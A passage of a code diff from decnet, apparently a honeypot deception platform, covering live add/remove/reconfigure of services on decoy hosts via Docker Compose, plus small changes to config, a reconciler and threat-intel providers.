compose command.
|
||||
|
||||
Two scopes:
|
||||
|
||||
* **Topology** — source of truth is the ``topology_deckies`` table; the
|
||||
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
|
||||
* **Fleet** — source of truth is ``decnet-state.json`` (with the
|
||||
``fleet_deckies`` table mirroring it); compose is the unihost
|
||||
``decnet-compose.yml``.
|
||||
|
||||
Both publish ``decky.<name>.service.added`` /
|
||||
``decky.<name>.service.removed`` on the bus. The new topic constants
|
||||
are documented in ``wiki-checkout/Service-Bus.md``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import subprocess # nosec B404
|
||||
from pathlib import Path
|
||||
from typing import Any, Literal, Optional
|
||||
|
||||
import anyio
|
||||
|
||||
from decnet.bus import topics
|
||||
from decnet.logging import get_logger
|
||||
from decnet.services.base import BaseService
|
||||
from decnet.services.registry import get_service
|
||||
from decnet.topology.persistence import hydrate
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
# Heavy imports (composer/deployer pull in decnet.network → docker) are
|
||||
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
|
||||
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
|
||||
# pattern in decnet.canary.planter for the same reason.
|
||||
|
||||
|
||||
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
|
||||
"""Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
|
||||
|
||||
Real implementation lives in :mod:`decnet.engine.deployer`; we
|
||||
import-and-delegate at call time to keep this module's import graph
|
||||
clean (see module docstring above).
|
||||
"""
|
||||
from decnet.engine.deployer import _compose as _real_compose
|
||||
if compose_file is None:
|
||||
_real_compose(*args, env=env)
|
||||
else:
|
||||
_real_compose(*args, compose_file=compose_file, env=env)
|
||||
|
||||
|
||||
def _topology_compose_path(topology_id: str) -> Path:
|
||||
from decnet.engine.deployer import _topology_compose_path as _real_path
|
||||
return _real_path(topology_id)
|
||||
|
||||
|
||||
def _write_topology_compose(hydrated, path: Path) -> Path:
|
||||
from decnet.topology.compose import write_topology_compose
|
||||
return write_topology_compose(hydrated, path)
|
||||
|
||||
|
||||
def _load_state():
|
||||
from decnet.config import load_state as _real_load_state
|
||||
return _real_load_state()
|
||||
|
||||
|
||||
def _save_state(config, compose_path) -> None:
|
||||
from decnet.config import save_state as _real_save_state
|
||||
_real_save_state(config, compose_path)
|
||||
|
||||
|
||||
def _write_compose(config, compose_path) -> None:
|
||||
from decnet.composer import write_compose as _real_write_compose
|
||||
_real_write_compose(config, compose_path)
|
||||
|
||||
|
||||
def _get_bus():
|
||||
from decnet.bus.factory import get_bus
|
||||
return get_bus()
|
||||
|
||||
|
||||
# --------------------------- swarm propagation helpers ---------------------------
|
||||
#
|
||||
# Service mutations (add/remove/update_config) on a deployed decky used to run
|
||||
# the master's local docker-compose only. For swarm fleet deckies the master
|
||||
# has no containers; for agent-targeted topologies the master only writes a
|
||||
# compose file the worker never sees. These helpers replay the change to the
|
||||
# worker so the env actually lands.
|
||||
#
|
||||
# Lazy imports keep this module's import graph clean (composer/swarm pull in
|
||||
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
|
||||
|
||||
|
||||
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
|
||||
"""Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
|
||||
shards = await repo.list_decky_shards()
|
||||
for s in shards:
|
||||
if s.get("decky_name") == decky_name:
|
||||
return s.get("host_uuid")
|
||||
return None
|
||||
|
||||
|
||||
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
|
||||
"""Re-push the host's full shard to its worker agent.
|
||||
|
||||
Uses the same code path as POST /swarm/deploy: load master state, filter
|
||||
to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
|
||||
The agent regenerates compose and recreates only the changed containers.
|
||||
Idempotent for unchanged deckies.
|
||||
"""
|
||||
from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
|
||||
|
||||
state = _load_state()
|
||||
if state is None:
|
||||
log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
|
||||
return
|
||||
config, _compose_path = state
|
||||
host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
|
||||
if not host_deckies:
|
||||
log.warning(
|
||||
"redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
|
||||
host_uuid,
|
||||
)
|
||||
return
|
||||
filtered = config.model_copy(update={"deckies": host_deckies})
|
||||
await dispatch_decnet_config(filtered, repo)
|
||||
|
||||
|
||||
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
|
||||
"""If the topology is agent-pinned, push the latest hydrated blob to the worker."""
|
||||
from decnet.engine.deployer import resync_agent_topology
|
||||
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is None:
|
||||
return
|
||||
if not hydrated.get("topology", {}).get("target_host_uuid"):
|
||||
return # unihost topology — local compose is authoritative
|
||||
await resync_agent_topology(repo, topology_id)
|
||||
|
||||
|
||||
log = get_logger("engine.services_live")
|
||||
|
||||
DeckyKind = Literal["fleet", "topology"]
|
||||
|
||||
|
||||
class ServiceMutationError(ValueError):
|
||||
"""Raised for caller-correctable failures. The API layer dispatches on
|
||||
subclass to produce 4xx codes; base class maps to 422.
|
||||
"""
|
||||
|
||||
|
||||
class ServiceNotFoundError(ServiceMutationError):
|
||||
"""Decky or topology does not exist → 404."""
|
||||
|
||||
|
||||
class ServiceConflictError(ServiceMutationError):
|
||||
"""Idempotency violation (already on / not on) → 409."""
|
||||
|
||||
|
||||
def _validate_service_for_per_decky(name: str) -> BaseService:
|
||||
"""Return the registered service or raise ``ServiceMutationError``.
|
||||
|
||||
``fleet_singleton`` services run once per fleet (e.g. an LLMNR
|
||||
responder), not per-decky — we reject the per-decky add/remove
|
||||
request rather than silently producing a no-op compose entry.
|
||||
"""
|
||||
try:
|
||||
svc = get_service(name)
|
||||
except KeyError as exc:
|
||||
raise ServiceMutationError(f"unknown service {name!r}") from exc
|
||||
if svc.fleet_singleton:
|
||||
raise ServiceMutationError(
|
||||
f"service {name!r} is fleet_singleton; not addable per-decky"
|
||||
)
|
||||
return svc
|
||||
|
||||
|
||||
async def _publish(topic: str, payload: dict[str, Any]) -> None:
|
||||
"""Best-effort bus publish — same shape as the canary planter's helper."""
|
||||
try:
|
||||
bus = _get_bus()
|
||||
await bus.connect()
|
||||
await bus.publish(topic, payload)
|
||||
await bus.close()
|
||||
except Exception as e: # noqa: BLE001
|
||||
log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
|
||||
|
||||
|
||||
# ---------------------------------------------------------- topology path
|
||||
|
||||
|
||||
async def _topology_decky(
|
||||
repo: BaseRepository, topology_id: str, decky_name: str,
|
||||
) -> dict[str, Any]:
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is None:
|
||||
raise ServiceNotFoundError(f"topology {topology_id!r} not found")
|
||||
for d in hydrated["deckies"]:
|
||||
cfg = d.get("decky_config") or {}
|
||||
name = cfg.get("name") or d.get("name")
|
||||
if name == decky_name:
|
||||
return d
|
||||
raise ServiceNotFoundError(
|
||||
f"decky {decky_name!r} is not in topology {topology_id!r}"
|
||||
)
|
||||
|
||||
|
||||
async def _rerender_topology_compose(
|
||||
repo: BaseRepository, topology_id: str,
|
||||
) -> Path:
|
||||
"""Re-hydrate + re-render the per-topology compose file.
|
||||
|
||||
Called after a successful DB update so future deploys reflect the
|
||||
change; without this the file would still describe the old service
|
||||
set and a subsequent ``up -d`` would resurrect the removed service.
|
||||
"""
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is None: # pragma: no cover — narrow race
|
||||
raise ServiceNotFoundError(
|
||||
f"topology {topology_id!r} disappeared mid-mutation"
|
||||
)
|
||||
path = _topology_compose_path(topology_id)
|
||||
_write_topology_compose(hydrated, path)
|
||||
return path
|
||||
|
||||
|
||||
async def _add_topology_service(
|
||||
repo: BaseRepository,
|
||||
topology_id: str,
|
||||
decky_name: str,
|
||||
service_name: str,
|
||||
initial_config: dict | None = None,
|
||||
) -> list[str]:
|
||||
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||
services: list[str] = list(decky.get("services") or [])
|
||||
if service_name in services:
|
||||
raise ServiceConflictError(
|
||||
f"service {service_name!r} already on decky {decky_name!r}"
|
||||
)
|
||||
services.append(service_name)
|
||||
update: dict[str, Any] = {"services": services}
|
||||
# If the caller supplied initial config, fold it into decky_config
|
||||
# BEFORE compose regen so the first ``up`` materialises the env on
|
||||
# the new container — no follow-up apply needed.
|
||||
if initial_config:
|
||||
cfg_blob = dict(decky.get("decky_config") or {})
|
||||
sc = dict(cfg_blob.get("service_config") or {})
|
||||
sc[service_name] = initial_config
|
||||
cfg_blob["service_config"] = sc
|
||||
update["decky_config"] = cfg_blob
|
||||
await repo.update_topology_decky(decky["uuid"], update)
|
||||
|
||||
compose_path = await _rerender_topology_compose(repo, topology_id)
|
||||
if await _topology_is_agent_pinned(repo, topology_id):
|
||||
# Agent-pinned: the master's local compose has nothing to up.
|
||||
# Push the new hydrated blob to the worker.
|
||||
await _resync_agent_topology(repo, topology_id)
|
||||
else:
|
||||
target = f"{decky_name}-{service_name}"
|
||||
# Run compose in a worker thread so the API event loop stays
|
||||
# responsive — same pattern as engine/deployer.deploy_topology.
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose(
|
||||
"up", "-d", "--no-deps", "--build", target,
|
||||
compose_file=compose_path,
|
||||
),
|
||||
)
|
||||
return services
|
||||
|
||||
|
||||
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is None:
|
||||
return False
|
||||
return bool(hydrated.get("topology", {}).get("target_host_uuid"))
|
||||
|
||||
|
||||
async def _remove_topology_service(
|
||||
repo: BaseRepository,
|
||||
topology_id: str,
|
||||
decky_name: str,
|
||||
service_name: str,
|
||||
) -> list[str]:
|
||||
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||
services: list[str] = list(decky.get("services") or [])
|
||||
if service_name not in services:
|
||||
raise ServiceConflictError(
|
||||
f"service {service_name!r} not on decky {decky_name!r}"
|
||||
)
|
||||
services = [s for s in services if s != service_name]
|
||||
target = f"{decky_name}-{service_name}"
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
|
||||
if not agent_pinned:
|
||||
# Stop + rm before persisting + re-rendering so a half-completed
|
||||
# mutation leaves the operator a clear state to retry from
|
||||
# (container still running; DB still says service is on).
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose("stop", target, compose_file=compose_path),
|
||||
)
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose("rm", "-f", target, compose_file=compose_path),
|
||||
)
|
||||
await repo.update_topology_decky(decky["uuid"], {"services": services})
|
||||
await _rerender_topology_compose(repo, topology_id)
|
||||
if agent_pinned:
|
||||
# Worker tears down the removed service when it diffs the
|
||||
# incoming hydrated blob against its current state.
|
||||
await _resync_agent_topology(repo, topology_id)
|
||||
return services
|
||||
|
||||
|
||||
# ---------------------------------------------------------- fleet path
|
||||
|
||||
|
||||
def _fleet_state_or_raise() -> tuple[Any, Path]:
|
||||
state = _load_state()
|
||||
if state is None:
|
||||
raise ServiceMutationError(
|
||||
"no fleet state on disk — run `decnet up` first"
|
||||
)
|
||||
return state
|
||||
|
||||
|
||||
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
|
||||
for d in config.deckies:
|
||||
if d.name == decky_name:
|
||||
return d
|
||||
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
|
||||
|
||||
|
||||
async def _persist_fleet_change(
|
||||
repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
|
||||
) -> None:
|
||||
"""Persist the mutation to JSON state, compose file, and the DB row."""
|
||||
config, _ = _load_state()
|
||||
target = _fleet_find_decky(config, decky.name)
|
||||
target.services = services
|
||||
_save_state(config, compose_path)
|
||||
_write_compose(config, compose_path)
|
||||
# Mirror to the DB row so DB-only consumers (dashboard, API) see the
|
||||
# change without waiting for the reconciler.
|
||||
from decnet.web.db.models import LOCAL_HOST_SENTINEL
|
||||
await repo.upsert_fleet_decky({
|
||||
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
|
||||
"name": decky.name,
|
||||
"services": services,
|
||||
"decky_config": target.model_dump(mode="json"),
|
||||
"decky_ip": decky.ip,
|
||||
"state": "running",
|
||||
})
|
||||
|
||||
|
||||
async def _add_fleet_service(
|
||||
repo: BaseRepository,
|
||||
decky_name: str,
|
||||
service_name: str,
|
||||
initial_config: dict | None = None,
|
||||
) -> list[str]:
|
||||
config, compose_path = _fleet_state_or_raise()
|
||||
decky = _fleet_find_decky(config, decky_name)
|
||||
services: list[str] = list(decky.services or [])
|
||||
if service_name in services:
|
||||
raise ServiceConflictError(
|
||||
f"service {service_name!r} already on decky {decky_name!r}"
|
||||
)
|
||||
services.append(service_name)
|
||||
if initial_config:
|
||||
# Same path as _update_fleet_service_config: stash the validated
|
||||
# cfg on the decky model so the compose write picks it up.
|
||||
sc = dict(getattr(decky, "service_config", None) or {})
|
||||
sc[service_name] = initial_config
|
||||
decky.service_config = sc
|
||||
await _persist_fleet_change(repo, decky, services, compose_path)
|
||||
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||
if swarm_host_uuid:
|
||||
# Master has no container for this decky — re-push the host's
|
||||
# shard so the worker materialises the new service.
|
||||
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||
else:
|
||||
target = f"{decky_name}-{service_name}"
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose(
|
||||
"up", "-d", "--no-deps", "--build", target,
|
||||
compose_file=compose_path,
|
||||
),
|
||||
)
|
||||
return services
|
||||
|
||||
|
||||
async def _remove_fleet_service(
|
||||
repo: BaseRepository, decky_name: str, service_name: str,
|
||||
) -> list[str]:
|
||||
config, compose_path = _fleet_state_or_raise()
|
||||
decky = _fleet_find_decky(config, decky_name)
|
||||
services: list[str] = list(decky.services or [])
|
||||
if service_name not in services:
|
||||
raise ServiceConflictError(
|
||||
f"service {service_name!r} not on decky {decky_name!r}"
|
||||
)
|
||||
services = [s for s in services if s != service_name]
|
||||
target = f"{decky_name}-{service_name}"
|
||||
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||
if not swarm_host_uuid:
|
||||
# Local: stop+rm before persist so the operator has a clear retry
|
||||
# state if compose fails halfway. Swarm: skip — the worker's compose
|
||||
# will handle the removal when the redispatched config drops the
|
||||
# service from the decky.
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose("stop", target, compose_file=compose_path),
|
||||
)
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose("rm", "-f", target, compose_file=compose_path),
|
||||
)
|
||||
await _persist_fleet_change(repo, decky, services, compose_path)
|
||||
if swarm_host_uuid:
|
||||
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||
return services
|
||||
|
||||
|
||||
# ---------------------------------------------------------- public api
|
||||
|
||||
|
||||
async def add_service(
|
||||
repo: BaseRepository,
|
||||
*,
|
||||
decky_kind: DeckyKind,
|
||||
decky_name: str,
|
||||
service_name: str,
|
||||
topology_id: Optional[str] = None,
|
||||
config: dict | None = None,
|
||||
) -> list[str]:
|
||||
"""Add *service_name* to a deployed decky.
|
||||
|
||||
Validates the service registry (rejects unknown / fleet_singleton
|
||||
names) and the optional ``config`` against the service's schema,
|
||||
persists the change, regenerates the compose file, runs
|
||||
``up -d --no-deps --build <decky>-<service>`` in a worker thread,
|
||||
and publishes ``decky.<name>.service.added`` on the bus.
|
||||
|
||||
``config`` is the same dict shape PUT/POST .../config accepts; it's
|
||||
coerced via ``BaseService.validate_cfg`` before any state write so
|
||||
a 400-class failure leaves zero side-effects.
|
||||
|
||||
Returns the post-mutation services list.
|
||||
"""
|
||||
svc = _validate_service_for_per_decky(service_name)
|
||||
initial_config = svc.validate_cfg(config) if config else {}
|
||||
if decky_kind == "topology":
|
||||
if not topology_id:
|
||||
raise ServiceMutationError(
|
||||
"decky_kind=topology requires topology_id",
|
||||
)
|
||||
services = await _add_topology_service(
|
||||
repo, topology_id, decky_name, service_name,
|
||||
initial_config=initial_config,
|
||||
)
|
||||
elif decky_kind == "fleet":
|
||||
services = await _add_fleet_service(
|
||||
repo, decky_name, service_name,
|
||||
initial_config=initial_config,
|
||||
)
|
||||
else: # pragma: no cover — Literal narrows
|
||||
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||
|
||||
await _publish(
|
||||
topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
|
||||
{
|
||||
"decky_name": decky_name,
|
||||
"service_name": service_name,
|
||||
"topology_id": topology_id,
|
||||
"services": services,
|
||||
},
|
||||
)
|
||||
log.info(
|
||||
"services_live.add decky=%s topology=%s service=%s",
|
||||
decky_name, topology_id, service_name,
|
||||
)
|
||||
return services
|
||||
|
||||
|
||||
async def update_service_config(
|
||||
repo: BaseRepository,
|
||||
*,
|
||||
decky_kind: DeckyKind,
|
||||
decky_name: str,
|
||||
service_name: str,
|
||||
cfg: dict,
|
||||
apply: bool = False,
|
||||
topology_id: Optional[str] = None,
|
||||
) -> dict:
|
||||
"""Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.
|
||||
|
||||
The submitted dict is validated against the service's
|
||||
``config_schema`` (unknown keys dropped, types coerced) BEFORE any
|
||||
DB write, so a 400-class failure leaves zero side-effects.
|
||||
|
||||
``apply=False`` (Save): only the DB row + compose file are updated.
|
||||
The running container keeps its old env.
|
||||
``apply=True`` (Apply): same persistence, then a force-recreate of
|
||||
``<decky>-<service>`` so the container picks
|
||||
up the new env. Destructive: drops any
|
||||
in-container session state on that service.
|
||||
|
||||
Returns the post-mutation validated cfg.
|
||||
"""
|
||||
svc = _validate_service_for_per_decky(service_name)
|
||||
validated = svc.validate_cfg(cfg)
|
||||
if decky_kind == "topology":
|
||||
if not topology_id:
|
||||
raise ServiceMutationError(
|
||||
"decky_kind=topology requires topology_id",
|
||||
)
|
||||
await _update_topology_service_config(
|
||||
repo, topology_id, decky_name, service_name, validated, apply=apply,
|
||||
)
|
||||
elif decky_kind == "fleet":
|
||||
await _update_fleet_service_config(
|
||||
repo, decky_name, service_name, validated, apply=apply,
|
||||
)
|
||||
else: # pragma: no cover
|
||||
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||
|
||||
await _publish(
|
||||
topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
|
||||
{
|
||||
"decky_name": decky_name,
|
||||
"service_name": service_name,
|
||||
"topology_id": topology_id,
|
||||
"service_config": validated,
|
||||
"recreated": bool(apply),
|
||||
},
|
||||
)
|
||||
log.info(
|
||||
"services_live.update_config decky=%s topology=%s service=%s apply=%s",
|
||||
decky_name, topology_id, service_name, apply,
|
||||
)
|
||||
return validated
|
||||
|
||||
|
||||
async def _update_topology_service_config(
|
||||
repo: BaseRepository,
|
||||
topology_id: str,
|
||||
decky_name: str,
|
||||
service_name: str,
|
||||
validated: dict,
|
||||
*,
|
||||
apply: bool,
|
||||
) -> None:
|
||||
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||
if service_name not in (decky.get("services") or []):
|
||||
raise ServiceConflictError(
|
||||
f"service {service_name!r} not on decky {decky_name!r}"
|
||||
)
|
||||
cfg_blob = dict(decky.get("decky_config") or {})
|
||||
sc = dict(cfg_blob.get("service_config") or {})
|
||||
sc[service_name] = validated
|
||||
cfg_blob["service_config"] = sc
|
||||
await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
|
||||
compose_path = await _rerender_topology_compose(repo, topology_id)
|
||||
if apply:
|
||||
if await _topology_is_agent_pinned(repo, topology_id):
|
||||
await _resync_agent_topology(repo, topology_id)
|
||||
else:
|
||||
target = f"{decky_name}-{service_name}"
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose(
|
||||
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
|
||||
compose_file=compose_path,
|
||||
),
|
||||
)
|
||||
|
||||
|
||||
async def _update_fleet_service_config(
|
||||
repo: BaseRepository,
|
||||
decky_name: str,
|
||||
service_name: str,
|
||||
validated: dict,
|
||||
*,
|
||||
apply: bool,
|
||||
) -> None:
|
||||
config, compose_path = _fleet_state_or_raise()
|
||||
decky = _fleet_find_decky(config, decky_name)
|
||||
if service_name not in (decky.services or []):
|
||||
raise ServiceConflictError(
|
||||
f"service {service_name!r} not on decky {decky_name!r}"
|
||||
)
|
||||
sc = dict(getattr(decky, "service_config", None) or {})
|
||||
sc[service_name] = validated
|
||||
decky.service_config = sc
|
||||
_save_state(config, compose_path)
|
||||
_write_compose(config, compose_path)
|
||||
from decnet.web.db.models import LOCAL_HOST_SENTINEL
|
||||
await repo.upsert_fleet_decky({
|
||||
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
|
||||
"name": decky.name,
|
||||
"services": list(decky.services or []),
|
||||
"decky_config": decky.model_dump(mode="json"),
|
||||
"decky_ip": decky.ip,
|
||||
"state": "running",
|
||||
})
|
||||
if apply:
|
||||
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||
if swarm_host_uuid:
|
||||
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||
else:
|
||||
target = f"{decky_name}-{service_name}"
|
||||
# Docker Compose tracks the previous container by ID. If that
|
||||
# container was already removed (or renamed during a prior failed
|
||||
# deploy), --force-recreate fails with "No such container". Pre-
|
||||
# remove by name so Compose starts from a clean slate.
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: subprocess.run( # nosec B603 B607
|
||||
["docker", "rm", "-f", target],
|
||||
capture_output=True,
|
||||
),
|
||||
)
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose(
|
||||
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
|
||||
compose_file=compose_path,
|
||||
),
|
||||
)
|
||||
|
||||
|
||||
async def remove_service(
|
||||
repo: BaseRepository,
|
||||
*,
|
||||
decky_kind: DeckyKind,
|
||||
decky_name: str,
|
||||
service_name: str,
|
||||
topology_id: Optional[str] = None,
|
||||
) -> list[str]:
|
||||
"""Remove *service_name* from a deployed decky.
|
||||
|
||||
Stops + removes the service container, persists the new services
|
||||
list, re-renders the compose file (so the next ``up -d`` doesn't
|
||||
bring it back), and publishes ``decky.<name>.service.removed``.
|
||||
|
||||
Returns the post-mutation services list.
|
||||
"""
|
||||
if decky_kind == "topology":
|
||||
if not topology_id:
|
||||
raise ServiceMutationError(
|
||||
"decky_kind=topology requires topology_id",
|
||||
)
|
||||
services = await _remove_topology_service(
|
||||
repo, topology_id, decky_name, service_name,
|
||||
)
|
||||
elif decky_kind == "fleet":
|
||||
services = await _remove_fleet_service(repo, decky_name, service_name)
|
||||
else: # pragma: no cover
|
||||
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||
|
||||
await _publish(
|
||||
topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
|
||||
{
|
||||
"decky_name": decky_name,
|
||||
"service_name": service_name,
|
||||
"topology_id": topology_id,
|
||||
"services": services,
|
||||
},
|
||||
)
|
||||
log.info(
|
||||
"services_live.remove decky=%s topology=%s service=%s",
|
||||
decky_name, topology_id, service_name,
|
||||
)
|
||||
return services
|
||||
@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
|
||||
# DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
|
||||
# updater / swarmctl subcommands (which never touch auth) can start without
|
||||
# the master's JWT secret being present in the environment.
|
||||
DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
|
||||
DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
|
||||
|
||||
# Agent-side RFC 5424 sink written by decnet.collector.worker when run on
|
||||
# a SWARM worker. The forwarder tails this file and ships lines over
|
||||
@@ -114,11 +114,6 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
|
||||
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
||||
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
||||
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
||||
# Bind address for the master-side swarm controller. Loopback by default —
|
||||
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
|
||||
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
|
||||
# swarmctl-host in /etc/decnet/decnet.ini.
|
||||
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
|
||||
|
||||
# Ingester batching: how many log rows to accumulate per commit, and the
|
||||
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
||||
|
||||
@@ -128,6 +128,8 @@ async def reconcile_once(
|
||||
container_states = await asyncio.to_thread(
|
||||
_collect_container_states, docker_client_factory,
|
||||
)
|
||||
docker_known = container_states is not None
|
||||
|
||||
json_names = {d.name for d in json_deckies}
|
||||
|
||||
# 1. INSERT: present in JSON, absent from DB.
|
||||
@@ -136,7 +138,7 @@ async def reconcile_once(
|
||||
continue
|
||||
new_state = (
|
||||
_aggregate_decky_state(d.name, list(d.services), container_states)
|
||||
if container_states is not None else "running"
|
||||
if docker_known else "running"
|
||||
)
|
||||
row_host = d.host_uuid or host_uuid
|
||||
await repo.upsert_fleet_decky({
|
||||
@@ -166,7 +168,7 @@ async def reconcile_once(
|
||||
)
|
||||
|
||||
# 3. STATE: present in both, docker says something fresh.
|
||||
if container_states is not None:
|
||||
if docker_known:
|
||||
for d in json_deckies:
|
||||
existing = db_by_name.get(d.name)
|
||||
if existing is None:
|
||||
|
||||
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
|
||||
from decnet.geoip.lookup import Lookup
|
||||
from decnet.geoip.paths import ensure_root
|
||||
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
||||
from decnet.geoip.rir.parse import Range, parse_file
|
||||
from decnet.geoip.rir.parse import parse_file
|
||||
|
||||
logger = logging.getLogger("decnet.geoip.rir.provider")
|
||||
|
||||
@@ -45,7 +45,7 @@ class RirProvider(Provider):
|
||||
except Exception as exc:
|
||||
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
||||
|
||||
ranges: list[Range] = []
|
||||
ranges = []
|
||||
for path in self.data_paths():
|
||||
if not path.exists():
|
||||
continue
|
||||
|
||||
@@ -17,6 +17,7 @@ later if operators report drift.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
@@ -92,25 +93,12 @@ class AbuseIPDBProvider(IntelProvider):
|
||||
data = payload.get("data") or {}
|
||||
score = int(data.get("abuseConfidenceScore") or 0)
|
||||
verdict = _score_to_verdict(score)
|
||||
# AbuseIPDB returns ``data.reports[*].categories`` — a list of
|
||||
# int codes per report. Flatten the union across all recent
|
||||
# reports so the IntelLifter sees the full activity profile,
|
||||
# not just the most-recent report's categories. Sorted for
|
||||
# determinism (matters for tests + for the bus payload diff).
|
||||
categories: set[int] = set()
|
||||
for report in data.get("reports") or []:
|
||||
if not isinstance(report, dict):
|
||||
continue
|
||||
for cat in report.get("categories") or []:
|
||||
if isinstance(cat, int):
|
||||
categories.add(cat)
|
||||
return IntelResult(
|
||||
provider=self.name,
|
||||
verdict=verdict,
|
||||
column_updates={
|
||||
"abuseipdb_score": score,
|
||||
"abuseipdb_categories": sorted(categories),
|
||||
"abuseipdb_raw": data,
|
||||
"abuseipdb_raw": json.dumps(data),
|
||||
"abuseipdb_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
|
||||
@@ -78,33 +78,3 @@ class IntelProvider(ABC):
|
||||
entire IP. Implementations should also respect
|
||||
``self._semaphore`` to bound in-flight calls.
|
||||
"""
|
||||
|
||||
|
||||
class MalHashProvider(ABC):
|
||||
"""Abstract bad-hash lookup provider.
|
||||
|
||||
Sibling to :class:`IntelProvider` — different keyspace (file SHA-256
|
||||
vs IP), different consumer (the email ingester at observation time,
|
||||
not the IP-keyed intel-worker fan-out). Kept as a separate ABC so
|
||||
the ``lookup(ip)`` semantics on ``IntelProvider`` stay honest.
|
||||
|
||||
Concrete impls today:
|
||||
|
||||
* :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
|
||||
shape mirroring :class:`decnet.intel.feodo.FeodoProvider`.
|
||||
|
||||
Future impls (paid VirusTotal subscription, in-house allowlist) plug
|
||||
in behind the same factory in :func:`decnet.intel.factory.get_mal_hash_provider`.
|
||||
"""
|
||||
|
||||
name: str
|
||||
|
||||
@abstractmethod
|
||||
async def is_known_bad(self, sha256: str) -> bool:
|
||||
"""Return whether *sha256* is on this provider's bad-hash list.
|
||||
|
||||
MUST NOT raise — return ``False`` on any error (the caller is the
|
||||
ingester, not a worker; an exception here would taint a totally
|
||||
unrelated bus payload). The provider is responsible for logging
|
||||
its own errors.
|
||||
"""
|
||||
|
||||
@@ -21,7 +21,7 @@ from __future__ import annotations
|
||||
import os
|
||||
from typing import List
|
||||
|
||||
from decnet.intel.base import IntelProvider, MalHashProvider
|
||||
from decnet.intel.base import IntelProvider
|
||||
|
||||
_KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")
|
||||
|
||||
